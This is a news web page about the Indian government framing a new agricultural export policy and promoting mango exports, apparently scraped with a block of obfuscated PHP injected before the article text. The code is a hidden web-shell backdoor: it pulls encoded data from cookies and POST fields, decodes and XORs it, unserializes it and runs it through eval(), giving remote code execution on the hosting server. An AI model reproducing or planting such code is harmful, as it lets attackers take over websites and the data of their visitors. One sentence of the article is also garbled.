$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} The centre to frame new export policy for agri products; asked the state governments for recommendations – Mannira

The centre to frame new export policy for agri products; asked the state governments for recommendations

The centre to frame a new export policy for agri products and it has asked the state governments for recommendations regarding the draft policy. According to the Union Commerce Secretary Rita Teaotia, the government would draft an export policy for agri and other related products and the draft export policy has been put in public domain already.

Addressing the 2nd Reverse Buyers Sellers Meet (RBSM) for Export of Mangoes and other Tropical Fruits under joint aegis of Agricultural & Processed Food Products Export Development Authority (APEDA) and PHD Chamber of Commerce and Industry in Mumbai today, the Commerce Secretary also asked APEDA to explore the possibilities of multiplying agri export through sea routes.

As this channel is cheaper and reduces the exporting cost for the exporters, the centre aims to promote exports via India’s sea ports. The Commerce Secretary also said that India’s wide varieties of mangoes. The export figures are not encouraging as the demand is confined to two or three major varieties. So, the Secretary directed the APEDA to act upon the necessary steps to promote export of multiple varieties of mangoes.

Teaotia also said that India is the fruit basket of the world because of its wide range of tropical fruit varieties with finest quality and taste. She said that India is the largest producer of Mangoes in the world with a production of around 41 per cent of total global production. India grows nearly 1000 varieties of Mangoes across the country and out of these 11 commercial varieties are grown in more than 10 States.

She also emphasised that export of agricultural products has been the priority of the government and APEDA, along with the Ministry of Commerce and Industry, has been instrumental in promoting quality agri products. India has taken a number of measures by strengthening the production supply chain, setting up of required infrastructure, package houses and Post-Harvest Treatment Facilities to gain market access in various countries in the past, she added.

Also Read: Indian agri workers to be affected by heat stress and loss of working hours due to rising temperature

Image: pixabay.com